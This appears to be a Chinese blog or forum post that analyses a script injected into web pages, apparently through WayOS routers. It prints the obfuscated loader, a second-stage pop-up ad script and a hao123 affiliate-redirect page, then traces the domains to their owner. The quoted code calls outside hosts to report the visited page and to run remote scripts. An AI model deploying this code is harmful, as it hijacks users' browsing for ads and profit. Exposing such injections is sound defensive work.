打开任何网站,查看源代码,在html网页文件底部插入一行JS代码:
<script type="text/javascript" src="http://n.cosbot.cn/rb/i7.js"></script>
解析后得到源代码片段
(function(d) { function $a(p) { try { var x = d.getElementsByTagName("head")[0]; var y = x.appendChild($s(p)); setTimeout(function() { x.removeChild(y) }, 2000) } catch (e) {} } function $c(n) { return d.createElement(n) } function $s(p) { var j = $c("script"); j.src = p; j.async = true; j.type = "text/javascript"; return j } var amt = 0; function $rn() { var ww = d.body.clientWidth; var hh = d.body.clientHeight; var u = { j: "ht", c: "com.cn", q: "tp:", m: "b.", n: "wdzs", d: "a." }; var be = u.j + u.q + "//" + u.d + u.n + u.m + u.c; var en = escape(window.location.href) + "&a=" + Math.random() + "&w=" + ww + "&h=" + hh; if (top == this) { if (ww < 300 || hh < 40) { amt += 1; if (amt < 3) { setTimeout($rn, 1000) } else { $a(be + "/fmt7p/m.php?u=" + en) } } else { $a(be + "/fmt7p/?u=" + en) } } } setTimeout($rn, 500) })(document);
这段JS的作用是执行一个动态的js,源代码拼接后如下
http://a.wdzsb.com.cn/fmt7p/?u=http://www.wmdfw.com/baidu.php&a=0.3494681795691035&w=1349&h=3174
作用是将变量u,a,w,h几个参数传递给JS.直接访问后可以得到源代码片段
(function(w, d) { var gid = "bd_uuid_rb_111268"; function $c(n) { return d.createElement(n) } function $show() { var e = d.getElementById(gid); if (e) { e.style.display = "block" } } function $isdone() { var e = d.getElementById(gid); if (e) { return true } return false } function $rm() { var e = d.getElementById(gid); if (e) { e.style.display = "none" } setTimeout($del, 10000) } function $del() { var e = d.getElementById(gid); if (e) { e.parentNode.removeChild(e) } } function $drn() { if ($isdone()) { return } var l = $c("div"); l.id = gid; l.style.display = "none"; l.oncontextmenu = function() { return false }; l = d.body.appendChild(l); var isIE6 = w.navigator.userAgent.match(/MSIE 6/ig) && !w.navigator.userAgent.match(/MSIE 7|8/ig); var sty = ""; if (isIE6) { sty = "BORDER-RIGHT: 0px; BORDER-TOP: 0px; DISPLAY: block; Z-INDEX: 2147483647; RIGHT: 0px; padding:0;MARGIN: 0px; BORDER-LEFT: 0px; WIDTH: 300px; BOTTOM: auto; BORDER-BOTTOM: 0px; POSITION: absolute; TOP: expression(eval ((document.documentElement&&document.documentElement.scrollTop|| document.body.scrollTop)+(document.documentElement&&document.documentElement.clientHeight||document.body.clientHeight)-this.offsetHeight-0)); HEIGHT: 250px; BACKGROUND-COLOR: #ecf9fd; TEXT-ALIGN: left" } else { sty = "display: block; position: fixed; padding: 0px; margin: 0px; border: 0px none;text-align: left; z-index: 2147483647; 300px; height: 250px; right: 0px; bottom: 0px; top: auto;" } var k = $c("div"); k.style.cssText = sty; k = l.appendChild(k); k.innerHTML = "<span style="position:absolute;42px;height:14px;line-height:20px;right:0px;top:- 14px;cursor:pointer;text-align:right;display:block;background: url(http://dl.katman.cn/img/close.gif) 0px 0px no-repeat scroll;" onmouseover= "this.style.backgroundPosition='0 -20px';" onmouseout="this.style.backgroundPosition='0 0';" onclick="javascript:var e=document.getElementById('bd_uuid_rb_111268');if(!e)return;e.style.display='none';setTimeout(function(){var e=document.getElementById ('bd_uuid_rb_111268');if(e){e.parentNode.removeChild(e)}},10000);"></span>"; var ifr = $c("iframe"); ifr.scrolling = "no"; ifr.marginWidth = "0"; ifr.marginHeight = "0"; ifr.frameBorder = "0"; ifr.height = "250px"; ifr.width = "300px"; ifr = k.appendChild(ifr); var ul = "http://dl.katman.cn/cl/html/fmt7p.html"; try { var doc = ifr.contentWindow.document; doc.open().write('<body onload="javascript:' + "window.location.href='" + ul + "';">"); doc.close() } catch (e) { ifr.src = ul } } function $dly() { $drn(); setTimeout($show, 2000); setTimeout($rm, 1000 * 1800) } if (!window._fmt_done_pg) { window._fmt_done_pg = 1; setTimeout($dly, 50) } })(window, document);
主要展示http://dl.katman.cn/cl/html/fmt7p.html地址的右下角窗口广告
因此不难看出域名
n.cosbot.cn a.wdzsb.com.cn dl.katman.cn
打开站长之家http://tool.chinaz.com/,查询到这三个域名均为成都西维数码科技有限公司 郑清华所有
与每次wayos偷偷换广告地址所有者完全一致
http://n.cosbot.cn/cl/html/hao.html
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Cache-Control" content="no-cache"> <meta http-equiv="Expires" content="0"> <title>hao123_上网从这里开始</title> </head> <body> <script> (function(d){ function isCkie(){ var isSupport=false; if(typeof(navigator.cookieEnabled)!='undefined'){ isSupport=navigator.cookieEnabled; } return isSupport; } //Cookie相关函数 var sCkie=new function(){ //过期时间 this.expTime=function(millisecond){if(millisecond.length==0){millisecond=0};var exp=new Date();exp.setTime(exp.getTime()+parseInt(millisecond));return exp.toGMTString();}; //创建cookie this.add=function(name,value,expires,path,domain,secure){d.cookie=name+"="+encodeURI(value)+(expires?(';expires='+expires):'')+(path?(';path='+path):'')+(domain?(';domain='+domain):'')+((secure)?';secure':'');}; //删除cookie //this.del=function(name,path,domain){if(getCookie(name)){document.cookie=name+"="+((path)?(";path="+path):'')+((domain)?(";domain="+domain):'')+";expires=Mon,01-Jan-2006 00:00:01 GMT";}}; //获取cookie this.get=function(name){var arg=name+"=";var alen=arg.length;var theCookie=''+d.cookie;var inCookieSite=theCookie.indexOf(arg);if(inCookieSite==-1||name==""){return '';}var begin=inCookieSite+alen;var end=theCookie.indexOf(';',begin);if(end==-1){end=theCookie.length;}return decodeURI(theCookie.substring(begin,end));}; }; var gUrl; if(isCkie()){ var ckie=0; var sid='lpvt_eef100d08ffffab743f371e2d5729249'; var skie=sCkie.get(sid); if (skie!='') { ckie=parseInt(skie); } if(ckie<1){ var rand=Math.random(); if(rand<1.8){ gUrl="https://www.hao123.com/?tn=90826472_hao_pg"; }else{ gUrl="https://www.hao123.com/"; } sCkie.add(sid,'1',sCkie.expTime(1*60*60*1000),0,0,0); }else{ gUrl="https://www.hao123.com/"; } }else{ gUrl="https://www.hao123.com/"; } (function(u){if(window.navigate&&typeof navigate=='function')navigate(u);var ua=navigator.userAgent;if(ua.match(/applewebkit/i)){var h = document.createElement('a');h.rel='noreferrer';h.href=u;document.body.appendChild(h);var evt=document.createEvent('MouseEvents');evt.initEvent('click', true,true);h.dispatchEvent(evt);}else{document.write('<meta http-equiv="Refresh" Content="0; Url='+u+'" >');}})(gUrl); })(document); </script> </body> </html>
51.la统计id:15820612
根据统计代码分析,广东地区为重灾区